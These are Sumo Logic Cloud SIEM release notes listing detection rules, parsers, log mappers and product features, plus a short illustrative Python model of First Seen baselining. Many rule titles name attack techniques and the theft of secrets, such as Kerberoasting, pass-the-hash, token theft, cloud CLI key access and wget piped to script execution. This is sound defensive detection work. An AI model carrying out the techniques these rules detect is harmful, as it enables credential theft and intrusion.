This release includes small modifications to First Seen rule type baseline and retention periods, and switches rule status from Prototype state, allowing more of these rules to contribute to Cloud SIEM Insights. The Microsoft Office 365 Audit parser now formulates key value pairs from the 'OperationProperties' array included in some messages.

Rules

  • [Updated] FIRST-S00002 First Seen AWS API Call from User
  • [Updated] FIRST-S00023 First Seen AWS API Gateway Enumeration by User
  • [Updated] FIRST-S00024 First Seen AWS SSM RunShellScript SendCommand From User
  • [Updated] FIRST-S00003 First Seen AWS Secrets Manager API Call from User
  • [Updated] FIRST-S00001 First Seen Administrative Privileges Granted for User
  • [Updated] FIRST-S00026 First Seen Anonymous Logon Change Activity to Domain Controller
  • [Updated] FIRST-S00019 First Seen Azure Member Addition to Group from User
  • [Updated] FIRST-S00020 First Seen Azure OAUTH Application Consent from User
  • [Updated] FIRST-S00021 First Seen Azure Virtual Machine Run Command Issued by User
  • [Updated] FIRST-S00028 First Seen Common Windows Recon Commands From User
  • [Updated] FIRST-S00013 First Seen Driver Load - Global
  • [Updated] FIRST-S00014 First Seen Driver Load - Host
  • [Updated] FIRST-S00007 First Seen DynamoDB Enumeration from User
  • [Updated] FIRST-S00027 First Seen InstallUtil Allow List Bypass From User
  • [Updated] FIRST-S00017 First Seen Kerberoasting Attempt from User - Global
  • [Updated] FIRST-S00018 First Seen Kerberoasting Attempt from User - Host
  • [Updated] FIRST-S00004 First Seen Local Group Addition by User
  • [Updated] FIRST-S00015 First Seen Macro Execution from User
  • [Updated] FIRST-S00016 First Seen Non-Network Logon from User
  • [Updated] FIRST-S00010 First Seen PowerShell Execution from Computer
  • [Updated] FIRST-S00009 First Seen RDP Logon From User
  • [Updated] FIRST-S00025 First Seen SMB Allowed Traffic From IP
  • [Updated] FIRST-S00029 First Seen Successful Authentication From Unexpected Country
  • [Updated] FIRST-S00011 First Seen Sysmon IMPHASH - Global
  • [Updated] FIRST-S00012 First Seen Sysmon IMPHASH - Host

Parsers

  • [Updated] /Parsers/System/Microsoft/Office 365

February 22, 2023 - Content Release

Rules

  • [New] FIRST-S00001 First Seen Administrative Privileges Granted for User
  • [New] FIRST-S00003 First Seen AWS Secrets Manager API Call from User
  • [New] FIRST-S00004 First Seen Local Group Addition by User
  • [New] FIRST-S00005 First Seen User Creation From User
  • [New] FIRST-S00006 First Seen Weak Kerberos Encryption from User
  • [New] FIRST-S00007 First Seen DynamoDB Enumeration from User
  • [New] FIRST-S00008 First Seen whoami command From User
  • [New] FIRST-S00009 First Seen RDP From User
  • [New] FIRST-S00010 First Seen PowerShell Execution from Computer
  • [New] FIRST-S00011 First Seen Sysmon IMPHASH - Global
  • [New] FIRST-S00012 First Seen Sysmon IMPHASH - Host
  • [New] FIRST-S00013 First Seen Driver Load - Global
  • [New] FIRST-S00014 First Seen Driver Load - Host
  • [New] FIRST-S00015 First Seen Macro Execution from User
  • [New] FIRST-S00016 First Seen Non-Network Logon from User
  • [New] FIRST-S00017 First Seen Kerberoasting Attempt from User - Global
  • [New] FIRST-S00018 First Seen Kerberoasting Attempt from User - Host
  • [New] FIRST-S00019 First Seen Azure Member Addition to Group from User
  • [New] FIRST-S00020 First Seen Azure OAUTH Application Consent from User
  • [New] FIRST-S00021 First Seen Azure Virtual Machine Run Command Issued by User
  • [New] FIRST-S00022 First Seen S3 Bucket ACL Enumeration by User
  • [New] FIRST-S00023 First Seen AWS API Gateway Enumeration By User
  • [New] FIRST-S00024 First Seen AWS SSM RunShellScript SendCommand From User
  • [New] FIRST-S00025 First Seen SMB Allowed Traffic From IP
  • [New] FIRST-S00026 First Seen Anonymous Logon Change Activity to Domain Controller
  • [New] FIRST-S00027 First Seen InstallUtil Allow List Bypass From User
  • [New] FIRST-S00028 First Seen Common Windows Recon Commands From User
  • [Updated] MATCH-S00534 MacOS - Re-Opened Applications

Log Mappers

  • [New] CloudTrail - ecs.amazonaws.com - AwsApiCall-ExecuteCommand

February 22, 2023 Application Update

First Seen Rules

Sumo Logic is pleased to announce new features in Cloud SIEM that deliver enhanced User and Entity Behavioral Analytics (UEBA) capabilities. These new UEBA capabilities enable additional methods to detect and investigate anomalous or unexpected behavior that may signify a security threat.

The first feature is called a First Seen Rule. With this new rule type, Cloud SIEM can detect events such as “the first time a user logs in from a new location” without having to define a rule expression that is unique to each user in your environment (and the location(s) from which they usually log in). Other examples include detecting the unusual granting of administrative privileges, Windows recon commands, AWS Secrets Manager API calls, API gateway enumeration, and more.

First Seen Rules are defined like any other rule type, through the Content menu in Cloud SIEM.

A First Seen Rule definition

First Seen Rules operate based on a baseline. During this period of time - typically between 7 and 30 days - the system will learn what normal and expected behavior looks like. After the baseline is established, Cloud SIEM will begin generating Signals when unusual behavior is detected compared to that baseline. Baselines can be per-entity or global. (Note that the longer the baseline, the more accurate the model will be.)

Cloud SIEM will include a set of more than twenty First Seen Rules out of the box. These rules can be tuned and customized like any other rule type, and custom First Seen Rules can also be created.

For more information about how to use First Seen Rules, see the online documentation. You can also see an introduction to the feature by navigating to a new First Seen Rule in the Cloud SIEM UI.
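As an added illustration of the baseline mechanics described above (example code, not Sumo Logic's implementation), the following Python model learns values during a fixed baseline window and raises a Signal the first time a value outside that window has not been seen for the scope. The record fields, the seven-day baseline, the constructed sample records and the per-entity/global scope switch are assumptions for the example; the actual Cloud SIEM baselining logic is not described on this page.

```python
"""Added example: a First Seen rule over constructed records.

Not Sumo Logic code. Models the behaviour described above: values observed
during a baseline window are learned as "normal"; after the window ends, a
value not yet seen for the scope (one entity, or global) produces a Signal.
Baseline length, record layout and scope switch are assumptions.
"""
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample records: (timestamp, username, source country)
RECORDS = [
    ("2023-02-01T08:00:00", "alice", "US"),
    ("2023-02-02T09:00:00", "alice", "US"),
    ("2023-02-03T10:00:00", "bob", "DE"),
    ("2023-02-05T11:00:00", "bob", "DE"),
    ("2023-02-09T12:00:00", "alice", "US"),  # after baseline, already seen: no Signal
    ("2023-02-10T13:00:00", "alice", "BR"),  # first seen for alice and globally
    ("2023-02-11T14:00:00", "bob", "US"),    # first seen for bob; globally US is known
    ("2023-02-12T15:00:00", "alice", "BR"),  # learned at the previous Signal: no repeat
]


class FirstSeenRule:
    """Learns values per scope key; fires once per new value after the baseline."""

    def __init__(self, name, baseline_days=7, scope="entity"):
        self.name = name
        self.baseline = timedelta(days=baseline_days)
        self.scope = scope            # "entity" (per-user) or "global"
        self.baseline_start = None    # set by the first record processed
        self.seen = defaultdict(set)  # scope key -> set of learned values

    def _key(self, entity):
        return entity if self.scope == "entity" else "*"

    def process(self, ts, entity, value):
        """Return a Signal dict for a first-seen value, or None."""
        if self.baseline_start is None:
            self.baseline_start = ts
        in_baseline = ts - self.baseline_start < self.baseline
        key = self._key(entity)
        is_new = value not in self.seen[key]
        self.seen[key].add(value)     # a value is learned whether or not it fired
        if in_baseline or not is_new:
            return None
        return {"rule": self.name, "entity": entity,
                "value": value, "timestamp": ts.isoformat()}


def run_rule(records, scope="entity", baseline_days=7):
    """Feed records in time order and collect the Signals the rule produces."""
    rule = FirstSeenRule(f"First Seen Country from User ({scope})",
                         baseline_days, scope)
    signals = []
    for ts_str, user, country in records:
        signal = rule.process(datetime.fromisoformat(ts_str), user, country)
        if signal is not None:
            signals.append(signal)
    return signals


if __name__ == "__main__":
    for scope in ("entity", "global"):
        for s in run_rule(RECORDS, scope):
            print(scope, s["timestamp"], s["entity"], s["value"])
```

With the per-entity scope the model fires for alice's login from BR and for bob's login from US; with the global scope only BR is new, because US was already learned from alice during the baseline. Running the same data with a 30-day baseline yields no Signals at all, since every record falls inside the learning window: a longer baseline learns more of what is normal, at the cost of detection starting later.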

Entity Timeline

Another new feature that will help analysts investigate unusual activity with user accounts is the Entity Timeline:

The Entity Timeline

This feature visualizes all activity for a user – including all normalized records – in an easy-to-read timeline, eliminating the need to perform manual record searches.

Related actions are grouped together and Signals and Insights generated on that user are also displayed in the timeline with the relevant record(s). Actions can be clicked on to see a more detailed set of information, and full details can be easily opened in a new tab.

The feature can be found on the new Timeline tab on each Username Entity’s Detail page with quick links from Signal and Insight detail pages (located with the Entity summaries). It is only available for the Username Entity type at this time.

For more information about how to use the Entity Timeline, see the online documentation.

Minor Changes and Enhancements

  • [Updated] Entities listed in the Signals index (sec_signal) now include criticality and suppressed attributes (which reflect the state of those Entities when the Signal was generated).
  • [New] The Cloud SIEM API now supports searching the Threat Intelligence data by sourceName.
  • [Updated] The Threat Intelligence API GetThreatIntelIndicators endpoint now supports data sets of more than 10,000 indicators.
  • [Updated] The Insights API now supports searching (filtering) by confidence score.
  • [Updated] Cloud SIEM now supports up to 1000 inventory-based Entity Groups (the previous limit was 50).
  • [Updated] When viewing an Insight, a label is displayed that indicates the source. When an Insight is generated by a Custom Insight, it will now say Custom Insight (Rule) (instead of Rule) and Custom Insight (Signal) (instead of Signal) to reduce confusion with Insights generated by the Insight Algorithm through standard Rules and Signals.
  • [New] Entity Groups can now be managed in bulk by uploading CSV files from the Entity Groups list page.

Bug Fixes

  • The consolidated Insight ‘board’ view was not displaying properly in some instances.
  • An improper error message was displayed when attempting to create a rule with the same name as one that already existed.
  • The Insight Updates section on the HUD was displaying incorrectly if there were no recent updates.
  • The Insight creation source label was not positioned properly when scrolling an Insight Details page.
  • Entity notes could not be deleted.

February 17, 2023 - Content Release

Rules

  • [New] MATCH-S00842 Suspicious Azure CLI Keys Access on Linux Host
  • [New] MATCH-S00843 Suspicious GCP CLI Keys Access on Linux Host

Note that the following updates do not change detection capabilities and are only updates to descriptions and other metadata.

  • [Updated] MATCH-S00308 AWS CloudTrail - OpsWorks Describe Permissions Event
  • [Updated] MATCH-S00210 AWS CloudTrail - SQS List Queues Event
  • [Updated] MATCH-S00238 AWS CloudTrail - sensitive activity in KMS
  • [Updated] MATCH-S00594 Alibaba ActionTrail KMS Activity
  • [Updated] MATCH-S00417 Attrib.exe use to Hide Files and Folders
  • [Updated] MATCH-S00786 Azure - SQL Database Export
  • [Updated] MATCH-S00304 External Device Installation Denied
  • [Updated] FIRST-S00022 First Seen S3 Bucket ACL Enumeration by User
  • [Updated] MATCH-S00614 GCP Audit KMS Activity
  • [Updated] MATCH-S00466 MsiExec Web Install
  • [Updated] MATCH-S00288 NotPetya Ransomware Activity
  • [Updated] MATCH-S00634 Okta Admin App Access Attempt Failed
  • [Updated] MATCH-S00633 Okta Admin App Accessed
  • [Updated] MATCH-S00756 Outlook Homepage Modification
  • [Updated] MATCH-S00465 PXELoot Utility
  • [Updated] MATCH-S00200 Potential Pass the Hash Activity
  • [Updated] MATCH-S00546 Potential Reconnaissance Obfuscation
  • [Updated] MATCH-S00265 QuarksPwDump Dump File Observed
  • [Updated] MATCH-S00747 Registry Modification - Active Setup
  • [Updated] MATCH-S00754 Registry Modification - Microsoft Office Test Function Registry Entry
  • [Updated] MATCH-S00422 Spaces Before File Extension
  • [Updated] MATCH-S00196 Successful Overpass the Hash Attempt
  • [Updated] MATCH-S00293 Suspicious External Device Installation
  • [Updated] MATCH-S00342 Suspicious use of Dev-Tools-Launcher
  • [Updated] MATCH-S00279 TAIDOOR RAT DLL Load

Log Mappers

  • [Deleted] Sysdig Monitor C2C
  • [New] CloudTrail - s3.amazonaws.com - GetBucketAcl
  • [Updated] CloudTrail - s3.amazonaws.com - CreateBucket
  • [Updated] CloudTrail - s3.amazonaws.com - DeleteBucketCors
  • [Updated] CloudTrail - s3.amazonaws.com - DeleteBucketLifecycle
  • [Updated] CloudTrail - s3.amazonaws.com - DeleteBucketPolicy
  • [Updated] CloudTrail - s3.amazonaws.com - PutBucketAcl
  • [Updated] CloudTrail - s3.amazonaws.com - PutBucketCors
  • [Updated] CloudTrail - s3.amazonaws.com - PutBucketLifecycle
  • [Updated] CloudTrail - s3.amazonaws.com - PutBucketPolicy
  • [Updated] CloudTrail - s3.amazonaws.com - PutBucketReplication
  • [Updated] Fortinet App Control Logs
  • [Updated] Fortinet DLP Logs
  • [Updated] Fortinet DNS Logs
  • [Updated] Fortinet Event Logs
  • [Updated] Fortinet IPS Logs
  • [Updated] Fortinet Traffic Logs
  • [Updated] Fortinet VOIP Logs
  • [Updated] Fortinet Virus Logs
  • [Updated] Fortinet Webfilter Logs

Parsers

  • [Deleted] /Parsers/System/Sysdig/Sysdig Monitor C2C
  • [Updated] /Parsers/System/Fortinet/Fortigate/Fortigate-Syslog
  • [Updated] /Parsers/System/Pulse Secure/Pulse Secure Appliance

February 13, 2023 - Application Update

Active Entities Panel

To help analysts detect potential security issues as early as possible, a new panel has been added to the Heads Up Display (HUD):

Screenshot of the new Active Entities panel in Cloud SIEM

This panel lists the top five most active entities, ranked by Signal Severity Total. This metric, introduced with the Related Entities enhancement last year, is the sum of the severities of all unique Signals the Entity appears in during the current Insight detection window (typically, the past 14 days).

The count of Active Signals (Signals within the detection window that have not been included in an Insight) is also listed.

When hovering over the Entity value, the Entity’s type will be displayed. The Entity value is a link to that Entity’s details page.

Analysts can use this tool to investigate what appears to be risky activity and potentially address security issues proactively, before they are raised to the level of an Insight.

Minor Changes and Enhancements

  • [New] When looking at Signals in the new sec_signal index, attributes and values in array fields are now properly supported by auto-parsing, syntax like count by, and features like right-click > filter selected value.
  • [New] An attribute attackStage has been added to the new sec_signal index. This attribute summarizes the MITRE ATT&CK stage represented by the rule which triggered the Signal. The value is defined the same way as the attack_stage attribute included in the older Signal forwarding feature.
  • [Updated] The subResolution attribute is now included in the Insight payload for http v2 actions.
  • [Updated] The way Release Notes are listed in the Cloud SIEM UI is changing. There is no longer a “bell” item on the top menu; it has been replaced with a link to the Release Notes page in the Help menu. In addition, Release Notes are now directly visible in the UI when they are published.
  • [New] When executing a context action on a Signal, fields will now be passed to the context action if they are available based on the record(s) in context.

Bug Fixes

  • The “Radar” graph of records, Signals and Insights on the HUD has been updated so that the discontinuity at the top of the Signals section of the graph has been removed.
  • When viewing the raw log message corresponding to a normalized record, the wrong message was displayed.
  • The Network Block(s) associated with an Entity were not listed on the Entity details page.
  • When testing Rule expressions, sometimes the selected Tuning expression was not included.
  • Changes to entity tags or Criticality were not being listed on the History section of the Entity.
  • Entity Criticality was sometimes not displaying properly on the Insight details page.

February 8, 2023 - Content Release

Rules

  • [New] MATCH-S00838 Azure Active Directory Authentication Method Changed
  • [New] MATCH-S00836 Azure Conditional Access Policy Disabled
  • [New] MATCH-S00839 Azure Virtual Machine RunCommand Issued
  • [New] MATCH-S00837 Kubernetes Secrets Enumeration via Kubectl
  • [New] MATCH-S00835 Possible Dynamic URL Domain
  • [New] CHAIN-S00012 Potential Azure Persistence via Automation Accounts
  • [New] MATCH-S00841 Suspicious AWS CLI Keys Access on Linux Host
  • [New] MATCH-S00840 Suspicious Lambda Function - IAM Policy Attached
  • [Updated] THRESHOLD-S00074 Excessive Firewall Denies
  • [Updated] LEGACY-S00008 Possible Dynamic DNS Domain
  • [Updated] LEGACY-S00108 Threat Intel - Matched File Hash

Log Mappers

  • [New] Airtable Audit C2C
  • [New] Cisco Meraki Catch All - Custom Parser
  • [Updated] Linux OS Syslog - Process fw - iptables Events
  • [Updated] Proofpoint Targeted Attack Protection C2C - Message Blocked
  • [Updated] Proofpoint Targeted Attack Protection C2C - Message Delivered
  • [Updated] Proofpoint Targeted Attack Protection C2C - Message Permitted
  • [Updated] Windows - Security - 4624

Parsers

  • [New] /Parsers/System/Airtable/Airtable Audit C2C
  • [Updated] /Parsers/System/Cisco/Cisco ASA
  • [Updated] /Parsers/System/Cisco/Cisco Meraki
  • [Updated] /Parsers/System/Google/G Suite Audit
  • [Updated] /Parsers/System/Linux/Linux OS Syslog
  • [Updated] /Parsers/System/Linux/Shared/Linux Shared Syslog Headers
  • [Updated] /Parsers/System/Okta/Okta

January 20, 2023 - Content Release

Rules

  • [New] THRESHOLD-S00111 Sharepoint - Excessive Documents Accessed by External IP
  • [New] THRESHOLD-S00110 Sharepoint - External IP Downloaded Excessive Documents
  • [Updated] THRESHOLD-S00101 Sharepoint - Excessive Documents Accessed by User

January 19, 2023 Application Update

Minor Changes and Enhancements

  • [Updated] On the HUD, the Insight Activity widget has been updated. When selecting the Insight to display, the HUD will now choose based on this order of preference: In “New”, Unassigned, Highest GIS Confidence Score, Highest Severity, Newest. In addition, the design has been updated to improve readability.
  • [New] Users who wish to substitute custom Insight status(es) for the built-in “In Progress” status can now do so. After creating and organizing the custom status(es), the user can disable the “In Progress” status. (It cannot be deleted.) Note that it can be disabled only if there are no Insights currently set to “In Progress.”
  • Changes to Entity tags and criticality now appear in the Entity’s change history list.
  • The Sumo Terraform provider now includes support for custom columns in match lists.
  • Kubernetes (k8s) attribute fields are now normalized to include the namespace. The normalized fields are: normalizedPodName, normalizedDeploymentName, and normalizedReplicaSetName.

Resolved Issues

  • Some Insights could not be closed via the UI (though they could via API).
  • In the consolidated (parent/child) Insight view, in “Board” mode, scrolling was not working properly. In addition, links to other orgs had an error in the URL (a duplicate “/sec”).

January 13, 2023 - Content Release

Rules

  • [New] MATCH-S00825 AWS Secrets Manager Enumeration
  • [New] MATCH-S00827 Exposed AWS SNS Topic Created
  • [New] MATCH-S00823 Exposed AWS SQS Queue Created
  • [New] MATCH-S00828 Office 365 Exchange Transport Rule Created
  • [New] MATCH-S00829 Office 365 Exchange Transport Rule Enabled
  • [New] MATCH-S00830 Office 365 Forwarding Rule Created
  • [New] MATCH-S00833 Office 365 Inbox Rule Created
  • [New] MATCH-S00832 Office 365 Inbox Rule Updated
  • [New] MATCH-S00831 Office 365 Unified Audit Logging Disabled
  • [New] MATCH-S00824 Potential XMRig Execution with Traffic
  • [New] MATCH-S00826 SSH Keys Added to EC2 Instance
  • [New] MATCH-S00834 Sensitive Registry Key (WDigest) Edit
  • [Updated] MATCH-S00480 Solarwinds Suspicious Child Processes
  • [Updated] MATCH-S00504 User Added to Local Administrators

Log Mappers

  • [New] Windows - Microsoft-Windows-Sysmon/Operational - 22
  • [New] Windows - Microsoft-Windows-Sysmon/Operational - 23
  • [New] Windows - Microsoft-Windows-Sysmon/Operational - 24
  • [New] Windows - Microsoft-Windows-Sysmon/Operational - 25
  • [New] Windows - Microsoft-Windows-Sysmon/Operational - 26
  • [New] Windows - Microsoft-Windows-Sysmon/Operational - 27
  • [New] Windows - Microsoft-Windows-Sysmon/Operational - 28
  • [Updated] Cloudflare - Logpush
  • [Updated] Microsoft Office 365 AzureActiveDirectory Events
  • [Updated] Microsoft Office 365 Exchange Mailbox Audit Events
  • [Updated] Microsoft Office 365 Exchange Mailbox Authentication Events
  • [Updated] Microsoft Office 365 ExchangeItem Events
  • [Updated] Microsoft Office 365 ExchangeItemGroup Events
  • [Updated] Microsoft Office 365 RecordType 105
  • [Updated] Microsoft Office 365 RecordType 37
  • [Updated] Microsoft Office 365 RecordType 57
  • [Updated] Office 365 - Exchange Admin Events

Parsers

  • [New] /Parsers/System/Microsoft/Windows-Syslog WinCollect

Schema

  • [Updated] device_k8s_normalizedDeploymentName
  • [Updated] device_k8s_normalizedPodName
  • [Updated] device_k8s_normalizedReplicaSetName
  • [Updated] dstDevice_k8s_normalizedDeploymentName
  • [Updated] dstDevice_k8s_normalizedPodName
  • [Updated] dstDevice_k8s_normalizedReplicaSetName
  • [Updated] srcDevice_k8s_normalizedDeploymentName
  • [Updated] srcDevice_k8s_normalizedPodName
  • [Updated] srcDevice_k8s_normalizedReplicaSetName

January 5, 2023 - Content Release

Rules

  • [Updated] MATCH-S00556 Outbound Data Transfer Protocol Over Non-standard Port

Log Mappers

  • [New] Google G Suite - login-email_forwarding_change
  • [New] Laurel Linux Audit - Catch All
  • [New] Laurel Linux Audit - System Call
  • [New] Laurel Linux Audit - User Logon
  • [Updated] Lacework Alert

Parsers

  • [New] /Parsers/System/AWS/AWS Security Hub
  • [New] /Parsers/System/Laurel/Laurel Linux Audit
  • [New] /Parsers/System/Signal Science/Signal Science WAF
  • [New] /Parsers/System/Workday/Workday

Schema

  • [Updated] device_k8s_deployment
  • [Updated] device_k8s_pod
  • [Updated] device_k8s_replicaSet
  • [Updated] dstDevice_k8s_deployment
  • [Updated] dstDevice_k8s_pod
  • [Updated] dstDevice_k8s_replicaSet
  • [Updated] srcDevice_k8s_deployment
  • [Updated] srcDevice_k8s_pod
  • [Updated] srcDevice_k8s_replicaSet

This is an archive of 2022 Cloud SIEM Release Notes. The current Cloud SIEM Release Notes are here.

December 21, 2022 - Content Release

Rules

  • [Updated] MATCH-S00547 Script Execution Via WMI
  • [Updated] MATCH-S00684 Wget Passed to Script Execution Command

Log Mappers

  • [New] Azure Firewall Application Rule
  • [New] Azure Firewall DNS Proxy
  • [New] Azure Firewall Network Rule
  • [New] Microsoft O365 Exchange Message Trace C2C

Parsers

  • [New] /Parsers/System/Microsoft/O365 Exchange Message Trace C2C
  • [New] /Parsers/System/Microsoft/Windows XML from Azure
  • [Updated] /Parsers/System/Cisco/Cisco Firepower Syslog
  • [Updated] /Parsers/System/Microsoft/Microsoft Azure JSON

Schema

  • [New] email_recipient

December 14, 2022 - Content Release

Log Mappers

  • [Updated] Cisco ASA 710002-3 JSON
  • [Updated] Windows - Microsoft-Windows-PowerShell/Operational - 4104
  • [Updated] Windows - Microsoft-Windows-PowerShell/Operational - 4105
  • [Updated] Windows - Security - 4732

Parsers

  • [New] /Parsers/System/Snort/Snort
  • [Updated] /Parsers/System/Cisco/Cisco ASA
  • [Updated] /Parsers/System/Cisco/Cisco Firepower Syslog
  • [Updated] /Parsers/System/Okta/Okta
  • [Updated] /Parsers/System/Suricata/Suricata Syslog
  • [Updated] /Parsers/System/Zscaler/Zscaler Private Access/Zscaler Private Access-JSON

December 13, 2022 Application Update

New Entity Types

Eight new predefined Entity types have been added to Cloud SIEM. This enables customers to more accurately associate Signals and Insights with security threats. They are listed below along with the related normalized record schema attributes (which can be specified in Rule definitions):

Entity Type    Schema Attributes
Command        commandLine
Domain         http_referer_fqdn, http_url_fqdn
Email          targetUser_email, user_email
File           file_path, file_basename
Hash           file_hash_imphash, file_hash_md5, file_hash_pehash, file_hash_sha1, file_hash_sha256, file_hash_ssdeep
Process        baseImage, parentBaseImage
URL            http_url
User Agent     http_userAgent

If you already had a custom Entity type with the same or similar name, it will not be affected and will not be automatically migrated to the corresponding standard Entity type.

Entity Notes

Similar to the functionality on Insights, users can now attach notes to Entities:

Screenshot of Entity Notes user interface

These notes are retained permanently on the associated Entity and are visible to all users who can view the Entity.

Custom Time Windows for Rules

Threshold, Aggregation and Chain Rules now support custom time windows. Previously, when writing a Rule, a time window had to be chosen from a list of predefined options. With this enhancement, users can define a time window of any length in minutes, hours, or days, from a minimum of 1 minute to a maximum of 5 days (120 hours):

Screenshot of Custom Time Window for Rules user interface

Inventory Favorite Fields

Where inventory data is shown for an Entity, such as the Entity details page or the Insight details page, users can now “favorite” the inventory fields that should be shown in the summary list.

To do this, expand the Full Details view, hover to the left of the field, and click the star icon that appears. To remove the favorite selection, click the star icon again. The field selections are applied across all users and retained across sessions. (This behavior is the same as for favorite fields on Records.)

Screenshot of Inventory Favorite Fields user interface

Minor Changes and Enhancements

  • [Updated] The previously announced migration of our out-of-the-box rules from standard match lists to Entity tags has been postponed. New dates for this migration will be announced in the near future.
  • [New] Service providers using the Consolidated Insight List can now see Insights from client organizations across deployments.
  • [Updated] The usability of filters for list views when searching for an object that includes a specific tag schema has been enhanced.
  • [Removed] The link to download the Insight Enrichment Service has been removed from the Enrichment page. The link is specified in the installation instructions online.
  • [New] Users can now filter Records by Sensor Zone.

Resolved Issues

  • Importing data from CSV files via the UI was not working properly.
  • The http_url field was not being concatenated properly in some mapper scenarios.
  • Entity domain normalization was not working properly.
  • The Copy Expression feature in the UI did not copy Boolean values to the clipboard properly.
  • The Rule Tuning Expression list page was not auto-refreshing correctly.
  • Users were unable to filter the Signals list based on severity.
  • IP addresses in the 198.18.0.0/15 and 169.254.0.0/15 ranges were not being marked as private subnets per RFC1918.
  • Users without the proper permissions were able to add comments and Signals to Insights.
  • Regular expressions ending with an asterisk * were not working properly in search/list filters.

December 8, 2022 - Content Release

Rules

  • [Updated] MATCH-S00159 Windows - Permissions Group Discovery

Log Mappers

  • [Updated] Azure Administrative logs
  • [Updated] Azure NSG Flows
  • [Updated] Squid Proxy - Parser
  • [Updated] Windows - Security - 4624

Parsers

  • [Updated] /Parsers/System/Cisco/Cisco ASA
  • [Updated] /Parsers/System/Microsoft/Microsoft Azure JSON
  • [Updated] /Parsers/System/Palo Alto/PAN Firewall CSV

December 1, 2022 - Content Release

Log Mappers

  • [New] Azure Risky Users
  • [New] Azure User Risk Events
  • [New] CrowdStrike Falcon CustomerIOCEvent (CNC)
  • [New] CrowdStrike Falcon Host API IdpDetectionSummaryEvent (CNC)
  • [New] CrowdStrike Falcon Identity Protection (CNC)
  • [New] Microsoft Office 365 RecordType 105
  • [New] Microsoft Office 365 RecordType 37
  • [New] Microsoft Office 365 RecordType 57
  • [New] Windows - Security - Default
  • [Updated] Azure Event Hub - Windows Defender Logs
  • [Updated] Cisco ASA 106100 JSON
  • [Updated] Microsoft Office 365 Events
  • [Updated] Windows - Security - 4740

Parsers

  • [New] /Parsers/System/Microsoft/Microsoft Azure Nested JSON
  • [New] /Parsers/System/Microsoft/Windows-JSON
  • [Updated] /Parsers/System/Microsoft/Microsoft Azure JSON
  • [Updated] /Parsers/System/Palo Alto/PAN Firewall CSV

November 22, 2022 - Content Release

Rules

  • [Updated] MATCH-S00570 WMIPRVSE Spawning Process

Log Mappers

  • [Updated] Gigamon Threat Insight - Catch All
  • [Updated] Gigamon Threat Insight - Suricata
  • [Updated] Microsoft Office 365 Threat Intelligence Url Events

Parsers

  • [New] /Parsers/System/Gigamon/GigamonTI
  • [Updated] /Parsers/System/Lacework/Lacework JSON
  • [Updated] /Parsers/System/Palo Alto/PAN Firewall CSV

Schema

  • [Updated] baseImage
  • [Updated] commandLine
  • [Updated] file_basename
  • [Updated] file_hash_imphash
  • [Updated] file_hash_md5
  • [Updated] file_hash_pehash
  • [Updated] file_hash_sha1
  • [Updated] file_hash_sha256
  • [Updated] file_hash_ssdeep
  • [Updated] file_path
  • [Updated] http_referer_fqdn
  • [Updated] http_url
  • [Updated] http_url_fqdn
  • [Updated] http_userAgent
  • [Updated] parentBaseImage
  • [Updated] targetUser_email
  • [Updated] user_email

November 17, 2022 - Content Release

Log Mappers

  • [Updated] Windows - Microsoft-Windows-Sysmon/Operational - 1
  • [Updated] Windows - Microsoft-Windows-Sysmon/Operational - 15
  • [Updated] Windows - Microsoft-Windows-Sysmon/Operational - 6
  • [Updated] Windows - Microsoft-Windows-Sysmon/Operational - 7

Parsers

  • [Updated] /Parsers/System/Microsoft/Sysmon-JSON

November 15, 2022 - Content Release

Rules

  • [New] MATCH-S00822 Potential Microsoft Office In-Memory Token Theft
  • [Updated] MATCH-S00556 Outbound Data Transfer Protocol Over Non-standard Port

Log Mappers

  • [New] Cisco Meraki 8021x
  • [New] Cisco Meraki Client Association
  • [Updated] Microsoft Office 365 Threat Intelligence Url Events

Parsers

  • [Updated] /Parsers/System/Cisco/Cisco Meraki

November 11, 2022 - Content Release

Rules

  • [Updated] MATCH-S00582 Malicious Service Installs
  • [Updated] THRESHOLD-S00087 Slack - Possible Session Hijacking

Log Mappers

  • [New] BigQuery Gmail C2C - Catch All
  • [New] BigQuery Gmail C2C - Error in Delivery
  • [New] BigQuery Gmail C2C - Failed Delivery
  • [New] BigQuery Gmail C2C - Message was dropped by Gmail
  • [New] BigQuery Gmail C2C - Message was rejected by Google Groups
  • [Updated] AWSGuardDuty_Catch_All
  • [Updated] AWSGuardDuty_Discovery
  • [Updated] Azure Access Logs
  • [Updated] Azure Action Logs
  • [Updated] Azure Administrative logs
  • [Updated] Azure AuditEvent logs
  • [Updated] Azure ManagedIdentitySignInLogs
  • [Updated] Azure NonInteractiveUserSignInLogs
  • [Updated] Azure ServicePrincipalSignInLogs
  • [Updated] Azure Storage Analytics
  • [Updated] Azure Write and Delete Logs
  • [Updated] AzureActivityLog
  • [Updated] AzureActivityLog 01
  • [Updated] AzureActivityLog AuditLogs
  • [Updated] AzureDevOpsAuditing
  • [Updated] AzureDiagnosticLog
  • [Updated] Cisco ASA 113039 JSON
  • [Updated] Cisco Ironport MID - Custom Parser
  • [Updated] Cisco Ironport SFIMS - Custom Parser
  • [Updated] Cisco Ironport WSA - Custom Parser
  • [Updated] GCP App Engine Logs
  • [Updated] GCP Audit Logs
  • [Updated] GCP Firewall
  • [Updated] GCP Parser - Load Balancer
  • [Updated] GCP VPC Flows
  • [Updated] Kubernetes
  • [Updated] Office 365 - Exchange Admin Events
  • [Updated] Windows - Security - 4697
  • [Updated] Windows - Security - 4820

Parsers

  • [New] /Parsers/System/Google/GCP BigQuery Gmail
  • [Updated] /Parsers/System/Citrix/Citrix NetScaler Syslog
  • [Updated] /Parsers/System/Dell/Dell SonicWall
  • [Updated] /Parsers/System/Infoblox/Infoblox

Schema

  • [New] device_k8s_normalizedDeploymentName
  • [New] device_k8s_normalizedReplicaSetName
  • [New] dstDevice_k8s_normalizedDeploymentName
  • [New] dstDevice_k8s_normalizedReplicaSetName
  • [New] srcDevice_k8s_normalizedDeploymentName
  • [New] srcDevice_k8s_normalizedReplicaSetName

October 27, 2022 - Content Release

Rules

  • [New] CHAIN-S00011 Potential InstallUtil Allow List Bypass
  • [Updated] MATCH-S00818 Azure PRT Token Issued via Non Interactive Login
  • [Updated] MATCH-S00464 Suspicious Non-Standard InstallUtil Execution

Log Mappers

  • [Updated] AWS - Application Load Balancer - ALB
  • [Updated] AWS - Application Load Balancer - JSON
  • [Updated] AWS API Gateway
  • [Updated] AWS CloudFront
  • [Updated] AWS EKS - Custom Parser
  • [Updated] AWS Elastic Load Balancer - Custom Parser
  • [Updated] AWS GuardDuty Alerts from Sumo CIP
